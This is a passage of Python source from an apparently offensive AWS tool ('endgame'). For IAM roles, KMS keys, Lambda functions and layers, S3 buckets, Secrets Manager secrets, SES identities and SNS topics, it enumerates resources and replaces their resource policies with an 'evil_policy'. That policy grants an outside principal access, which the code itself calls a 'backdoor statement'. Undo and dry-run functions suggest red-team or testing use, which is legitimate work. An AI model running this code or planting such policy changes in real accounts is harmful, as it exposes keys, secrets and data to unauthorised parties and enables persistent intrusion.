include_resource_block=self.include_resource_block, override_action=self.override_action)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}::{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_role(RoleName=self.name)
policy = response.get("Role").get("AssumeRolePolicyDocument")
success = True
except self.client.exceptions.NoSuchEntityException:
logger.critical(f"There is no resource with the name {self.name}")
policy = constants.get_empty_policy()
success = False
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.update_assume_role_policy(RoleName=self.name, PolicyDocument=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class IAMRoles(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "iam"
self.resource_type = "role"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_roles")
page_iterator = paginator.paginate()
for page in page_iterator:
roles = page["Roles"]
for role in roles:
path = role.get("Path")
arn = role.get("Arn")
name = role.get("RoleName")
# Special case: Ignore Service Linked Roles
if path.startswith("/aws-service-role/"):
# if path == "/service-role/" or path.startswith("/aws-service-role/"):
continue
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,155 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn, get_resource_path_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html
class KmsKey(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "kms"
self.resource_type = "key"
self.region = region
self.current_account_id = current_account_id
if name.startswith("alias"):
self.alias = name
name = self._get_key_id_with_alias(name, client)
self.name = name
else:
self.name = name
self.alias = None
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_key_id_with_alias(self, name: str, client: boto3.Session.client) -> str:
"""Given an alias, return the key ID"""
response = client.describe_key(KeyId=name)
key_id = response.get("KeyMetadata").get("KeyId")
return key_id
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.get_key_policy
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_key_policy(KeyId=self.arn, PolicyName="default")
if response.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(response.get("Policy")).get("Statement"))
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.put_key_policy
new_policy = json.dumps(evil_policy)
logger.debug("Setting resource policy for %s" % self.arn)
try:
self.client.put_key_policy(KeyId=self.name, PolicyName="default", Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class KmsKeys(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "kms"
self.resource_type = "key"
self.current_account_id = current_account_id
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListKeys
def list_keys() -> list:
keys = []
paginator = self.client.get_paginator("list_keys")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Keys"]
for resource in these_resources:
key_id = resource.get("KeyId")
arn = resource.get("KeyArn")
keys.append(arn)
return keys
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListAliases
def filter_with_aliases(all_key_arns) -> list:
keys = []
key_arns_with_aliases = []
aws_managed_key_arns = []
paginator = self.client.get_paginator("list_aliases")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Aliases"]
for resource in these_resources:
alias = resource.get("AliasName")
key_id = resource.get("TargetKeyId")
arn = resource.get("AliasArn")
if alias.startswith("alias/aws") or alias.startswith("aws/"):
aws_managed_key_arns.append(arn)
if key_id:
aws_managed_key_arns.append(f"arn:aws:kms:{self.region}:{self.current_account_id}:key/{key_id}")
continue
else:
# keys.append(alias)
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=key_id, note=alias)
keys.append(list_resources_response)
key_arns_with_aliases.append(arn)
# If the key does not have an alias, return the key ID
for some_key_arn in all_key_arns:
if some_key_arn not in key_arns_with_aliases and some_key_arn not in aws_managed_key_arns:
key_id = get_resource_path_from_arn(some_key_arn)
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=key_id)
keys.append(list_resources_response)
return keys
key_ids = list_keys()
resources = filter_with_aliases(key_ids)
return resources

View File

@ -0,0 +1,150 @@
import json
import logging
from abc import ABC
import boto3
import botocore
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class LambdaFunction(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "lambda"
self.resource_type = "function"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_policy(FunctionName=self.name)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug("The Policy does not exist. We will have to add it.")
success = True
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
success = True
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
self.client.add_permission(
FunctionName=self.name,
StatementId=statement.sid,
Action=statement.actions[0],
Principal=statement.aws_principals[0],
)
success = True
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
success = False
policy_document = self._get_rbp().policy_document
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = True
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
try:
self.client.remove_permission(
FunctionName=self.name,
StatementId=statement.sid,
)
message = f"200: Removed backdoor statement from the resource policy attached to {self.arn}"
success = True
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class LambdaFunctions(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "lambda"
self.resource_type = "function"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_functions')
page_iterator = paginator.paginate()
for page in page_iterator:
functions = page["Functions"]
for function in functions:
name = function.get("FunctionName")
arn = function.get("FunctionArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,192 @@
import logging
import json
import boto3
from abc import ABC
import botocore
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.shared.policy_document import PolicyDocument
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared import constants
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class LambdaLayer(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "lambda"
self.resource_type = "layer"
self.name = name.split(":")[0]
self.version = int(name.split(":")[1])
super().__init__(self.name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}:{self.version}"
@property
def arn_without_version(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_layer_version_policy(LayerName=self.name, VersionNumber=self.version)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug("The Policy does not exist. We will have to add it.")
success = True
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
success = True
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
if ":" in statement.aws_principals[0]:
account_id = get_account_from_arn(statement.aws_principals[0])
principal = f"arn:aws:iam::{account_id}:root"
elif "*" == statement.aws_principals[0]:
principal = "*"
else:
principal = statement.aws_principals[0]
try:
self.client.add_layer_version_permission(
LayerName=self.arn_without_version,
VersionNumber=self.version,
StatementId=statement.sid,
Action="lambda:GetLayerVersion",
Principal=principal,
)
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
policy_document = self._get_rbp().policy_document
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = True
try:
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
self.client.remove_layer_version_permission(
LayerName=self.name,
VersionNumber=self.version,
StatementId=statement.sid,
)
success = True
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class LambdaLayers(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "lambda"
self.resource_type = "layer"
@property
def layers(self):
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_layers')
page_iterator = paginator.paginate()
for page in page_iterator:
layers = page["Layers"]
for layer in layers:
name = layer.get("LayerName")
arn = layer.get("LayerArn")
resources.append(name)
return resources
def layer_version_arns(self, layer_name):
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_layer_versions')
page_iterator = paginator.paginate(
LayerName=layer_name
)
for page in page_iterator:
layers = page["LayerVersions"]
for layer in layers:
version = layer.get("Version")
layer_version_arn = layer.get("LayerVersionArn")
# name = get_resource_path_from_arn(layer_version_arn)
resources.append(layer_version_arn)
return resources
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
layers = self.layers
for layer_name in layers:
layer_arns = self.layer_version_arns(layer_name)
for arn in layer_arns:
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=layer_name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,98 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage, ResponseGetRbp
logger = logging.getLogger(__name__)
class S3Bucket(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "s3"
self.resource_type = "bucket"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:::{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
policy = constants.get_empty_policy()
try:
response = self.client.get_bucket_policy(Bucket=self.name)
policy = json.loads(response.get("Policy"))
message = "200: Successfully obtained bucket policy for %s" % self.arn
success = True
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
message = f"{error_code}: {error.response.get('Error').get('Message')} for {error.response.get('Error').get('BucketName')}"
if error.response['Error']['Code'] == "AccessDenied":
success = False
elif error.response['Error']['Code'] == "NoSuchBucketPolicy":
success = True
else:
# This occurs when there is no resource policy attached
success = True
except Exception as error:
message = error
success = False
logger.debug(message)
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_bucket_policy(Bucket=self.name, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class S3Buckets(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "s3"
self.resource_type = "bucket"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
response = self.client.list_buckets()
resources = []
for resource in response.get("Buckets"):
name = resource.get("Name")
arn = f"arn:aws:{self.service}:::{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,94 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SecretsManagerSecret(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "secretsmanager"
self.resource_type = "secret"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_resource_policy(SecretId=self.name)
if response.get("ResourcePolicy"):
policy = json.loads(response.get("ResourcePolicy"))
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_resource_policy(SecretId=self.name, ResourcePolicy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class SecretsManagerSecrets(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "secretsmanager"
self.resource_type = "secret"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_secrets")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["SecretList"]
for resource in these_resources:
name = resource.get("Name")
arn = resource.get("ARN")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,149 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SesIdentityPolicy(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.name = name
self.service = "ses"
self.resource_type = "identity"
self.region = region
self.current_account_id = current_account_id
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
self.identity_policy_names = self._identity_policy_names()
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _identity_policy_names(self) -> list:
try:
response = self.client.list_identity_policies(Identity=self.name)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.get_identity_policies
policy_names = response.get("PolicyNames")
except botocore.exceptions.ClientError:
policy_names = []
return policy_names
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# If you do not know the names of the policies that are attached to the identity, you can use ListIdentityPolicies
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.list_identity_policies
response = self.client.list_identity_policies(Identity=self.name)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.get_identity_policies
policy_names = response.get("PolicyNames")
if policy_names:
response = self.client.get_identity_policies(Identity=self.name, PolicyNames=policy_names)
policies = response.get("Policies")
if constants.SID_SIGNATURE in policies:
policy = json.loads(policies.get(constants.SID_SIGNATURE))
success = True
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_identity_policy(Identity=self.arn, PolicyName=constants.SID_SIGNATURE, Policy=new_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.put_identity_policy
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.delete_identity_policy"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = {
"Version": "2012-10-17",
"Statement": []
}
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.delete_identity_policy
operation = "UNDO"
# Update the list of identity policies
success = True
if constants.SID_SIGNATURE in self._identity_policy_names():
if not dry_run:
try:
self.client.delete_identity_policy(
Identity=self.name,
PolicyName=constants.SID_SIGNATURE
)
message = f"200: Removed identity policy called {constants.SID_SIGNATURE} for identity {self.name}"
success = True
except botocore.exceptions.ClientError as error:
success = False
message = error
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
message = f"202: Dry run: will remove identity policy called {constants.SID_SIGNATURE} for identity {self.name}"
else:
message = f"404: There is no policy titled {constants.SID_SIGNATURE} attached to {self.name}"
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class SesIdentityPolicies(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ses"
self.resource_type = "identity"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_identities")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Identities"]
for resource in these_resources:
arn = f"arn:aws:ses:{self.region}:{self.current_account_id}:identity/{resource}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=resource)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,192 @@
import json
import logging
from abc import ABC
import boto3
import botocore
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_string
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
# Valid SNS policy actions
# https://docs.aws.amazon.com/sns/latest/dg/sns-access-policy-language-api-permissions-reference.html#sns-valid-policy-actions
valid_sns_policy_actions = [
"sns:AddPermission",
"sns:DeleteTopic",
"sns:GetTopicAttributes",
"sns:ListSubscriptionsByTopic",
"sns:Publish",
"sns:Receive",
"sns:RemovePermission",
"sns:SetTopicAttributes",
"sns:Subscribe",
]
valid_sns_policy_actions_str = ",".join(valid_sns_policy_actions)
class SnsTopic(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.name = name
self.service = "sns"
self.region = region
self.current_account_id = current_account_id
self.resource_type = "topic"
self.override_account_id_instead_of_principal = True
self.override_action = ",".join(valid_sns_policy_actions)
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action, override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_topic_attributes(TopicArn=self.arn)
attributes = response.get("Attributes")
if attributes.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(attributes.get("Policy")).get("Statement"))
else:
policy = constants.get_empty_policy()
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.critical(error)
success = False
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
self.client.add_permission(
TopicArn=self.arn,
Label=statement.sid,
ActionName=self.sns_actions_without_prefixes(statement.actions),
AWSAccountId=statement.aws_principals,
)
